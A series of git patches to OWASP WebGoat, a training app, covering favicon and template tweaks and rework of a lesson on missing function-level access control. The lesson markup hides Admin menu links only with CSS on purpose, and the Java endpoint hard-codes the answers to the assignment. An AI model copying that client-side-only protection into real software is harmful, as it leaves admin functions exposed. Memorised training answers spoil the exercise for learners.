zl4a=5-q58O(*Z}4&fFOas9kH=l<EcIlk`-MkjXCE)%Jk%nYB};8@pPqvr3S}h%6Vj
z0L=uqWhXzmys(z6(4~c4SWnw>hD^4s>85K319=aZ#11P<{K(}cx=f|FK~x(W4pI*4
z*Y1%zYs{jQ=p1=b4bd{GF*skPezcS&L^b-bII&V+*CDEON!4}U6Z3LVSjjRQbS*~c
z)*iZ?<K{=Uh&=~O7^HoHSwOlDJw8F}j<~yzD@Jz6krbvjk4Fpz8G5KtgAkv;H|QHU
zCATcBgGS$l6QT(_GH0DIy*p>QogmPe^debl%sN$sdIh(4(U`bjTpSUP4)N)_>*+E{
zgR-qP7cYb$&eEIF#12LBIkL55EdYx-%ulQ#S;K(1wkiFYLeT=sK?gghk<kcA<r^ni
zI{C$(S-qWx;M1V$`z#nnU=<{<h~6wfG@(Rd@G5D6oLg5&vdp4lXNkKTjn@1}WZ*Re
zo}n;1ARbw%9^9ai^rxI?kDvWPMw;59Rx3C@umZ+-iWDPU>LQHG87z*CG6ZW_4x4dE
zl~}KchnMhriZ~jR5?os>F>H0k7_CO;HSdXG>2Ety59_z^8HDC1a!7}mHT9{DSh-Do
zo+jV=b00Q>gql!^&y0eo?W7-1&=71~Cv+wSX;S`@NZ5;)y}Tr-Rjd}r))iS*c4%BR
zw$bKliY|`P<q4s-=<0^XkVKf9ns{*8uzNIJca9IUma^XP*u2+*rHB(^+R-%b*VH}Q
ztcU3VEh=1pam9c<FYT<I@z~S^QtA`}adv33PF^6@6fH_*?<{D<buHT243M-dON86j
zcv!I0<u;4R>sC@{?zfy1R!b8D$6I#P!}gwWvE|HEhuTiwi=wHxV@<<)a0w^tZcG*3
zVEqCb(Bs4R0sT$iOaftCNZ%nelq*HR4XI2|pv7>nN=dF{gC*$60h}CKEwi=~7g>ob
zE1RP%M@W^#K%JVUbzSO3tF7SN)JTk19RjBVrY1{R%%ENpS2NsX8!0U+YBjML&iUNx
zu+ksE2DCNt_zIlLz@?VZ&8qimfzFS}fG_>zf?ch5IdQ4SBDG_0s1*ZgWo>1Mv#F7!
zgbFrV%qoTK{=IDjb!{!0x{E7vRB|NPcW9Qnv}FX{ig;{Mj$m%;l1#qd;C>`Iamm@S
zMeTB808)-@jInNPCK88Ymg^$Kx<+G*xZKvEuc)aKn>H1D{_^#gum7B{{~uaNPi<!Z
zOUeKM03~!qSaf7zbY(hYa%Ew3WdJfTGBGVNFfB7NR53F;H8DCgG%GMLIxsLzbdyW~
z001R)MObuXVRU6WZEs|0W_bWIFfuVMF)%GNF;p=#IyEsmG&CzPFgh?WJSi*i00012
zdQ@0+Qek%>aB^>EX>4U6ba`-PAZc)PV*mhnoa6Eg2ys>@D9TUE%t_@^00ScnE@KN5
zBNI!L6ay0=M1VBIWCJ6!R3OXP)X2ol#2my2%YaCrN-hBE7ZG&wLN%2D0000<MNUMn
GLSTZ~0K{Ja

literal 0
HcmV?d00001

diff --git a/webgoat-container/src/main/resources/templates/login.html b/webgoat-container/src/main/resources/templates/login.html
index bee48ffd7..733bcd7c6 100644
--- a/webgoat-container/src/main/resources/templates/login.html
+++ b/webgoat-container/src/main/resources/templates/login.html
@@ -2,6 +2,7 @@
 <html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org">
 <head>
     <title th:text="#{login.page.title}">Login Page</title>
+    <link rel="shortcut icon" th:href="@{/css/img/favicon.ico}" type="image/x-icon"/>
     <link rel="stylesheet" type="text/css" th:href="@{/css/main.css}"/>
     <link rel="stylesheet" type="text/css" th:href="@{/plugins/bootstrap/css/bootstrap.min.css}"/>
     <link rel="stylesheet" type="text/css" th:href="@{/css/font-awesome.min.css}"/>
diff --git a/webgoat-container/src/main/resources/templates/main_new.html b/webgoat-container/src/main/resources/templates/main_new.html
index 42bfc698a..ec6d2b87b 100644
--- a/webgoat-container/src/main/resources/templates/main_new.html
+++ b/webgoat-container/src/main/resources/templates/main_new.html
@@ -8,7 +8,7 @@
     <meta http-equiv="Cache-Control" CONTENT="no-store"/>
 
     <!--  CSS -->
-    <link rel="shortcut icon" th:href="@{/images/favicon.ico}" type="image/x-icon"/>
+    <link rel="shortcut icon" th:href="@{/css/img/favicon.ico}" type="image/x-icon"/>
 
     <link rel="stylesheet" type="text/css" th:href="@{/css/main.css}"/>
     <link rel="stylesheet" type="text/css" th:href="@{/plugins/bootstrap/css/bootstrap.min.css}"/>
diff --git a/webwolf/src/main/resources/static/css/img/favicon.ico b/webwolf/src/main/resources/static/css/img/favicon.ico
new file mode 100644
index 0000000000000000000000000000000000000000..d75680a696ef1bfdb98847093113de3e1a278558
GIT binary patch
literal 1032
zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE0wix1Z>k4UEa{HEjtmSN`?>!lvVtU&J%W50
z7^>757#dm_7=8hT8eT9klo~KFyh>nTu$sZZAYL$MSD+10f+@+{-G$+Qd;gjJKpuOE
zr>`sfQ!aUac765e$x%T0wVp1HAs)x4PWAQ(NfbF=U;I34Ur>){x#_~ru)HV^p_Hx*
zO5%yGfx1c^P1_tVEE5oKY7xluS|}D6pfJ<()*=ss4IdiUUzl>{1p8to!ygiRKj#}h
zJ~Q{^%GW>5zFR+^_rHAKf6M!p4Facv*S2j@Qs1;H@ajqj4u=y<wRleyJ=vq`$h$hK
z&0&RCv31csq50>yrYx^}ZZ|vY((@N(F6{wt{hIOvx1BpFzt@9Vs^s0hg|$xVTg5_s
zC7wJE2&*_?vO(H-)t&qauS6c$#xnfaxX9~r!K-}^%5@CWBDcSkWsa!uWJ_SXe~!_t
z(p{R7;hDs?+5gV}?b=o9J5y=T9;r={XOApri+rZOcgv-tn|$Z@9N%_Z%t7bU>FixU
zj|v^M$W~}OV!_bO`s>AlZo@EPm$C_STo}CXEN{&W`{$X#_wKFdoh!LJl|odbmc<<l
z$nk!xKFe8GNoV&7#h2?p2PbRv>^u}Lmh97NVtA54{%4Z*z0XsQ8Ol}8oc^fk>k9ol
z=2@XDdp2ydT<4V&UT~Ckw}Ul<+`A7V`jSs39ctXMKZk*7lPB{e%>%q=+!y%joLZ?M
zov+luV7EYm+1xy1sffl#)f@hjn=6vD6!;#Pd-7~L7Mi8;#9&$Pd$~y`(t8%Cs4#gv
zw%WO-xVvgogK));(<}^*w=|U+@@Icb-5~a>AlQ@b`wB(w25y_AF1Bk7%_5sl96#*x
z!_)nUlX5htWLRsO(#wz8&R@N*i<Yi(R=u_Qu~+yqztvaoh3ucbB~awl0~0Z|`!kNZ
z+uKetc56_#Ii4VTsP={E+?Zv3whKA#&9HeU;_h_v)HBxRGn>y@ePHa~R8aNSRH^R6
z)MSRoCOcWK+8kjPlaAOSQ)($JJZ<Mm;})K|7gsc$WA9PPj1hl&Z`S!09=x-zEK?5m
z4$cZG%-HjvF`r%b%dul0fvKKBwZt`|BqgyV)hf9t6-Y4{85kMr8XD*t8-^H~S{ayI
znV4%E7+4t?EHLQeMA49&pOTqYiCe?PT%)Z(4dGQG5hX#1<q8Ew`DvLssR|{P1*r;|
z1trN03>9-8f8yaN4Aam!<$wB&=hGktW@T=@WNu+)VeiQz%)$yT4JL<En3Xq&D4f1=
n<;0OQM`Vt$pKkD2;HAg#N?fqylauLGpcM?Bu6{1-oD!M<=Ln*R

literal 0
HcmV?d00001

diff --git a/webwolf/src/main/resources/templates/fragments/footer.html b/webwolf/src/main/resources/templates/fragments/footer.html
index 5a536d03b..e7711a19d 100644
--- a/webwolf/src/main/resources/templates/fragments/footer.html
+++ b/webwolf/src/main/resources/templates/fragments/footer.html
@@ -6,11 +6,8 @@
 <div th:fragment="footer">
 
     <div class="container">
-
         <footer>
-            © 2020 WebGoat - Use WebWolf at your own risk
-            <script type="text/javascript"
-                    src="webjars/bootstrap/3.3.7/js/bootstrap.min.js"></script>
+            © 2021 WebGoat - Use WebWolf at your own risk
         </footer>
     </div>
 
diff --git a/webwolf/src/main/resources/templates/fragments/header.html b/webwolf/src/main/resources/templates/fragments/header.html
index d8c3413d8..79f11fe0a 100644
--- a/webwolf/src/main/resources/templates/fragments/header.html
+++ b/webwolf/src/main/resources/templates/fragments/header.html
@@ -2,9 +2,7 @@
 <head>
     <title>WebWolf</title>
     <div th:fragment="header-css">
-        <link rel="stylesheet" type="text/css"
-              href="/webjars/bootstrap/3.3.7/css/bootstrap.min.css"/>
-        <!--<link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet"/>-->
+        <link rel="stylesheet" type="text/css" href="/webjars/bootstrap/3.3.7/css/bootstrap.min.css"/>
         <link rel="stylesheet" th:href="@{/css/main.css}"/>
         <script src="/webjars/jquery/3.5.1/jquery.min.js"></script>
         <script src="/webjars/bootstrap/3.3.7/js/bootstrap.min.js"></script>
diff --git a/webwolf/src/main/resources/templates/home.html b/webwolf/src/main/resources/templates/home.html
index e19d5c4d9..886e9a8d1 100644
--- a/webwolf/src/main/resources/templates/home.html
+++ b/webwolf/src/main/resources/templates/home.html
@@ -1,6 +1,7 @@
 <!DOCTYPE HTML>
 <html xmlns:th="http://www.thymeleaf.org">
 <head>
+    <link rel="icon" href="/css/img/favicon.ico"/>
     <div th:replace="fragments/header :: header-css"/>
 </head>
 <body>
diff --git a/webwolf/src/main/resources/templates/login.html b/webwolf/src/main/resources/templates/login.html
index 23fe24e79..e41189a16 100644
--- a/webwolf/src/main/resources/templates/login.html
+++ b/webwolf/src/main/resources/templates/login.html
@@ -3,6 +3,7 @@
 >
 <head>
     <title>WebWolf</title>
+    <link rel="icon" href="/css/img/favicon.ico"/>
     <div th:replace="fragments/header :: header-css"/>
 </head>
 <body>

From cd2e1c1c09d47a504707484bdaad0fcc664da202 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 2 Nov 2021 11:16:05 +0100
Subject: [PATCH 084/227] Fix spelling issues

---
 .../en/missing-function-ac-01-intro.adoc           |  8 ++++----
 .../en/missing-function-ac-02-client-controls.adoc |  8 ++++----
 .../en/missing-function-ac-03-users.adoc           | 14 ++++++++++----
 3 files changed, 18 insertions(+), 12 deletions(-)

diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc
index 3fa401c79..4616d8bbe 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-01-intro.adoc
@@ -1,9 +1,9 @@
 == Missing Function Level Access Control
 
-Access control, like preventing XSS with output encoding can be tricky to maintain. One needs to ensure it is enforced properly throughout the entire application, thus in every method/function.
+Access control, like preventing XSS with output encoding, can be tricky to maintain. One must ensure it is adequately enforced throughout the entire application, thus in every method/function.
 
 === IDOR vs Missing Function Level Access Control
 
-The fact is many people (including the author of this lesson) would combine function level access control and IDOR into 'Access Control'. For sake of OWASP Top 10 and these lessons, we will make a
-distinction. The distinction most made is that IDOR is more of a 'horizontal' or 'lateral' access control issue, and missing function level access control 'exposes functionality'. Even though,
-the IDOR lesson here demonstrates how functionality may also be exposed, (at least to another user in the same role), we will look at other ways functionality might be exposed.
+The fact is many people (including the author of this lesson) would combine function level access control and IDOR into 'Access Control.' For the sake of OWASP Top 10 and these lessons, we will make a
+distinction. The distinction most made is that IDOR is more of a 'horizontal' or 'lateral' access control issue, and missing function level access control 'exposes functionality.' Even though
+the IDOR lesson here demonstrates how functionality may also be exposed (at least to another user in the same role), we will look at other ways functionality might be exposed.
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
index 114ca7825..6c8441bcb 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
@@ -1,11 +1,11 @@
 == Relying on Obscurity
 
-One could rely on HTML, CSS or javascript to hide links that users don't normally access.
-In the past there has been a case where a network router tried to protect (hide) admin functionality with javascript in the UI: https://www.wired.com/2009/10/routers-still-vulnerable.
+One could rely on HTML, CSS, or javascript to hide links that users don't normally access.
+In the past, a network router tried to protect (hide) admin functionality with javascript in the UI: https://www.wired.com/2009/10/routers-still-vulnerable.
 
 === Finding Hidden Items
 
-There are usually hints to finding functionality the UI does not openly expose in ...
+There are usually hints to finding functionality the UI does not openly expose in:
 
 * HTML or javascript comments
 * Commented out elements
@@ -13,4 +13,4 @@ There are usually hints to finding functionality the UI does not openly expose i
 
 === Your Mission
 
-Find two invisible menu items in the menu below that are, or would be, of interest to an attacker/malicious user and submit the labels for those menu items (there are no links right now in the menus).
+Find two invisible menu items in the menu below that are or would be of interest to an attacker/malicious user and submit the labels for those menu items (there are no links right now in the menus).
\ No newline at end of file
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
index 9a7dfd52b..739f15dbf 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-03-users.adoc
@@ -1,9 +1,15 @@
-== Just Try It
+== Try it
 
-As the previous page described, sometimes applications rely on client-side controls to control access (obscurity). If you can find items which are invisible, just try them and see what happens. Yes, it can be that simple!
+As the previous page described, sometimes applications rely on client-side controls to control access (obscurity). If you can find invisible items, try them and see what happens. Yes, it can be that simple!
 
 === Gathering User Info
 
-Often data dumps originate from vulnerabilities such as sql injection, but they can also come from poor or lacking access control.
+Often data dumps originate from vulnerabilities such as SQL injection, but they can also come from poor or lacking access control.
 
-It will likely take multiple steps and multiple attempts to get this one. Pay attention to the comments and leaked info. And you'll need to do some guessing too.  You may need to use another browser/account along the way.  Start with the info you already gathered (hidden menu items) to see if you can pull the list of users and then provide the 'Hash' for your own user account.
+It will likely take multiple steps and multiple attempts to get this one:
+
+- Pay attention to the comments and leaked info.
+- You'll need to do some guessing too.
+- You may need to use another browser/account along the way.
+
+Start with the information you already gathered (hidden menu items) to see if you can pull the list of users and then provide the 'Hash' for your user account.
\ No newline at end of file

From bcaf4485c22d9312c48979725088bb5420330cde Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 2 Nov 2021 11:50:46 +0100
Subject: [PATCH 085/227] Move css to lesson itself

---
 .../missing-function-ac/src/main/resources/css/ac.css          | 3 ---
 .../src/main/resources/html/MissingFunctionAC.html             | 2 +-
 2 files changed, 1 insertion(+), 4 deletions(-)
 rename webgoat-container/src/main/resources/static/css/lessons.css => webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css (83%)

diff --git a/webgoat-container/src/main/resources/static/css/lessons.css b/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
similarity index 83%
rename from webgoat-container/src/main/resources/static/css/lessons.css
rename to webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
index f2e85dc27..ae659093a 100644
--- a/webgoat-container/src/main/resources/static/css/lessons.css
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
@@ -1,6 +1,3 @@
-/*  css for lessons */
-/* not efficient loading, but at least easier to maintain */
-
 .hidden-menu-item {
     display:none;
     visibility:hidden;
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
index e6cc66c42..b0589c439 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
@@ -6,7 +6,7 @@
 
     <div class="lesson-page-wrapper">
         <div class="adoc-content" th:replace="doc:missing-function-ac-02-client-controls.adoc"></div>
-
+        <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/ac.css}"/>
         <script th:src="@{/lesson_js/missing-function-ac.js}" > </script>
 
         <div class="attack-container">

From 2bd6b3621092ed4b7d8a2156095d579cbe2094fe Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 2 Nov 2021 14:01:17 +0100
Subject: [PATCH 086/227] Fix layout assignment 2

---
 .../MissingFunctionACHiddenMenus.java         |   1 -
 .../src/main/resources/css/ac.css             |  30 -----
 .../resources/html/MissingFunctionAC.html     | 124 ++++++++++--------
 .../main/resources/js/missing-function-ac.js  |   6 -
 ...issing-function-ac-02-client-controls.adoc |   6 +-
 5 files changed, 70 insertions(+), 97 deletions(-)
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/js/missing-function-ac.js

diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
index 160aca0e1..baa487694 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
@@ -45,7 +45,6 @@ public class MissingFunctionACHiddenMenus extends AssignmentEndpoint {
     @PostMapping(path = "/access-control/hidden-menu", produces = {"application/json"})
     @ResponseBody
     public AttackResult completed(String hiddenMenu1, String hiddenMenu2) {
-        //overly simple example for success. See other existing lesssons for ways to detect 'success' or 'failure'
         if (hiddenMenu1.equals("Users") && hiddenMenu2.equals("Config")) {
             return success(this)
                     .output("")
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css b/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
deleted file mode 100644
index ae659093a..000000000
--- a/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
+++ /dev/null
@@ -1,30 +0,0 @@
-.hidden-menu-item {
-    display:none;
-    visibility:hidden;
-}
-
-#ac-menu li {
-    list-style-type: none;
-    background-color: #aaa;
-    width: auto;
-    max-width: 20%;
-}
-
-#ac-menu li:hover {
-    color: white;
-    background-color: #333;
-}
-
-#ac-menu div {
-    margin-bottom: -60px;
-    margin-top: -10px;
-}
-
-#ac-menu h3 {
-    color:white;
-    background-color:#666;
-}
-
-#ac-menu-wrapper {
-    border-bottom: 2px solid #444;
-}
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
index b0589c439..c3465584c 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
@@ -1,82 +1,92 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
-    <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:missing-function-ac-01-intro.adoc"></div>
-    </div>
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:missing-function-ac-01-intro.adoc"></div>
+</div>
 
-    <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:missing-function-ac-02-client-controls.adoc"></div>
-        <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/ac.css}"/>
-        <script th:src="@{/lesson_js/missing-function-ac.js}" > </script>
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:missing-function-ac-02-client-controls.adoc"></div>
 
-        <div class="attack-container">
-            <div id="ac-menu-wrapper">
-                <div id="ac-menu">
-                    <h3 class="menu-header">Account</h3>
-                    <div class="menu-section">
-                        <ul>
-                            <li>My Profile</li>
-                            <li>Privacy/Security</li>
-                            <li>Log Out</li>
-                        </ul>
-                    </div>
-                    <h3 class="menu-header">Messages</h3>
-                        <div class="menu-section">
-                            <ul>
-                                <li>Unread Messages (3)</li>
-                                <li>Compose Message</li>
+    <div class="attack-container">
+        <nav class="navbar navbar-default">
+            <div class="container-fluid">
+
+                <div class="navbar-header">
+                    <a class="navbar-brand" href="#">WebGoat</a>
+                </div>
+
+                <div class="collapse navbar-collapse" id="alignment-example">
+
+                    <!-- Links -->
+                    <ul class="nav navbar-nav">
+                        <li class="dropdown">
+                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Account<span class="caret"></span></a>
+                            <ul class="dropdown-menu" aria-labelledby="about-us">
+                                <li><a href="#">My Profile</a></li>
+                                <li><a href="#">Privacy/Security</a></li>
+                                <li><a href="#">Log Out</a></li>
                             </ul>
-                        </div>
-                    <h3 class="hidden-menu-item menu-header">Admin</h3>
-                        <div class="menu-section hidden-menu-item">
-                            <ul>
+                        </li>
+                        <li class="dropdown">
+                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Messages<span class="caret"></span></a>
+                            <ul class="dropdown-menu" aria-labelledby="messages">
+                                <li><a href="#">Unread Messages (3)</a></li>
+                                <li><a href="#">Compose Message</a></li>
+                            </ul>
+                        </li>
+                        <li class="hidden-menu-item dropdown">
+                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Admin<span class="caret"></span></a>
+                            <ul class="dropdown-menu" aria-labelledby="admin">
                                 <li><a href="/users">Users</a></li>
                                 <li><a href="/config">Config</a></li>
                             </ul>
-                        </div>
+                        </li>
+                    </ul>
                 </div>
+
             </div>
+        </nav>
 
+        <br/>
+
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <form class="attack-form" accept-charset="UNKNOWN"
+              method="POST" name="form"
+              action="/WebGoat/access-control/hidden-menu">
+
+            <p>Hidden item 1 <input name="hiddenMenu1" value="" type="TEXT"/></p>
+            <p>Hidden item 2 <input name="hiddenMenu2" value="" type="TEXT"/></p>
             <br/>
+            <input name="submit" value="Submit" type="SUBMIT"/>
 
-            <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-            <form class="attack-form" accept-charset="UNKNOWN"
-                  method="POST" name="form"
-                  action="/WebGoat/access-control/hidden-menu">
-
-                <p>Hidden Item 1 <input name="hiddenMenu1" value="" type="TEXT" /></p>
-                <p>Hidden Item 2 <input name="hiddenMenu2" value="" type="TEXT" /></p>
-                <br/>
-                <input name="submit" value="Submit" type="SUBMIT"/>
-
-            </form>
-
-            <div class="attack-feedback"></div>
-            <div class="attack-output"></div>
-        </div>
+        </form>
 
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
     </div>
 
-    <div class="lesson-page-wrapper">
+</div>
 
-        <div class="adoc-content" th:replace="doc:missing-function-ac-03-users.adoc"></div>
+<div class="lesson-page-wrapper">
 
-        <div class="attack-container">
-            <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
-            <form class="attack-form" accept-charset="UNKNOWN"
-                  method="POST" name="form"
-                  action="/WebGoat/access-control/user-hash">
+    <div class="adoc-content" th:replace="doc:missing-function-ac-03-users.adoc"></div>
 
-                <p>Your Hash: <input name="userHash" value="" type="TEXT" /></p>
-                <br/>
-                <input name="submit" value="Submit" type="SUBMIT"/>
+    <div class="attack-container">
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <form class="attack-form" accept-charset="UNKNOWN"
+              method="POST" name="form"
+              action="/WebGoat/access-control/user-hash">
 
-            </form>
+            <p>Your Hash: <input name="userHash" value="" type="TEXT"/></p>
+            <br/>
+            <input name="submit" value="Submit" type="SUBMIT"/>
 
-            <div class="attack-feedback"></div>
-            <div class="attack-output"></div>
-        </div>
+        </form>
 
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
     </div>
 
+</div>
+
 </html>
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/js/missing-function-ac.js b/webgoat-lessons/missing-function-ac/src/main/resources/js/missing-function-ac.js
deleted file mode 100644
index 0f98933b5..000000000
--- a/webgoat-lessons/missing-function-ac/src/main/resources/js/missing-function-ac.js
+++ /dev/null
@@ -1,6 +0,0 @@
-webgoat.customjs.accessControlMenu = function() {
-    //webgoat.customjs.jquery('#ac-menu-ul').menu();
-    webgoat.customjs.jquery('#ac-menu').accordion();
-}
-
-webgoat.customjs.accessControlMenu();
\ No newline at end of file
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
index 6c8441bcb..19a13c0e2 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-02-client-controls.adoc
@@ -1,9 +1,9 @@
-== Relying on Obscurity
+== Relying on obscurity
 
 One could rely on HTML, CSS, or javascript to hide links that users don't normally access.
 In the past, a network router tried to protect (hide) admin functionality with javascript in the UI: https://www.wired.com/2009/10/routers-still-vulnerable.
 
-=== Finding Hidden Items
+=== Finding hidden items
 
 There are usually hints to finding functionality the UI does not openly expose in:
 
@@ -11,6 +11,6 @@ There are usually hints to finding functionality the UI does not openly expose i
 * Commented out elements
 * Items hidden via CSS controls/classes
 
-=== Your Mission
+=== Your mission
 
 Find two invisible menu items in the menu below that are or would be of interest to an attacker/malicious user and submit the labels for those menu items (there are no links right now in the menus).
\ No newline at end of file

From 9e6ed11aa789257059fbc88ad4bbec2a19c3c2e2 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 2 Nov 2021 14:31:34 +0100
Subject: [PATCH 087/227] Remove link to lesson.css as they belong to the
 lesson

---
 webgoat-container/src/main/resources/templates/main_new.html | 1 -
 1 file changed, 1 deletion(-)

diff --git a/webgoat-container/src/main/resources/templates/main_new.html b/webgoat-container/src/main/resources/templates/main_new.html
index ec6d2b87b..11c8d8385 100644
--- a/webgoat-container/src/main/resources/templates/main_new.html
+++ b/webgoat-container/src/main/resources/templates/main_new.html
@@ -15,7 +15,6 @@
     <link rel="stylesheet" type="text/css" th:href="@{/css/font-awesome.min.css}"/>
     <link rel="stylesheet" type="text/css" th:href="@{/css/animate.css}"/>
     <link rel="stylesheet" type="text/css" th:href="@{/css/coderay.css}"/>
-    <link rel="stylesheet" type="text/css" th:href="@{/css/lessons.css}"/>
 <!--    <link rel="stylesheet" type="text/css" th:href="@{/css/asciidoctor-default.css}"/>-->
 
     <!--  end of CSS -->

From 3ad51e6d6b6367306f6f1142636d081d4905fbfd Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 4 Nov 2021 17:04:23 +0100
Subject: [PATCH 088/227] Rewrite lesson to be self-contained and not depend on
 the core of WebGoat for fetching users Split the assignment into 2
 assignments

---
 .../org/owasp/webgoat/users/WebGoatUser.java  |   5 +-
 .../org/owasp/webgoat/AccessControlTest.java  | 103 +++++++++------
 .../owasp/webgoat/missing_ac/DisplayUser.java |  43 ++-----
 .../MissingAccessControlUserRepository.java   |  45 +++++++
 .../webgoat/missing_ac/MissingFunctionAC.java |   5 +-
 .../MissingFunctionACHiddenMenus.java         |   6 -
 .../missing_ac/MissingFunctionACUsers.java    |  81 ++++++------
 .../missing_ac/MissingFunctionACYourHash.java |  24 ++--
 .../MissingFunctionACYourHashAdmin.java       |  60 +++++++++
 .../org/owasp/webgoat/missing_ac/User.java    |  15 +++
 .../org/owasp/webgoat/missing_ac/Users.java   | 117 ------------------
 .../src/main/resources/css/ac.css             |   4 +
 .../db/migration/V2021_11_03_1__ac.sql        |   9 ++
 .../resources/html/MissingFunctionAC.html     |  29 ++++-
 .../resources/i18n/WebGoatLabels.properties   |  14 +--
 .../en/missing-function-ac-03-users.adoc      |   2 +-
 .../missing-function-ac-04-users-fixed.adoc   |   5 +
 .../webgoat/missing_ac/DisplayUserTest.java   |  21 ++--
 .../MissingFunctionACUsersTest.java           |  64 +++++-----
 .../MissingFunctionACYourHashAdminTest.java   |  44 +++++++
 .../MissingFunctionYourHashTest.java          |  44 +++----
 21 files changed, 409 insertions(+), 331 deletions(-)
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java
 delete mode 100644 webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/Users.java
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql
 create mode 100644 webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en/missing-function-ac-04-users-fixed.adoc
 create mode 100644 webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdminTest.java

diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java b/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java
index 23fcae34d..e6e720c36 100644
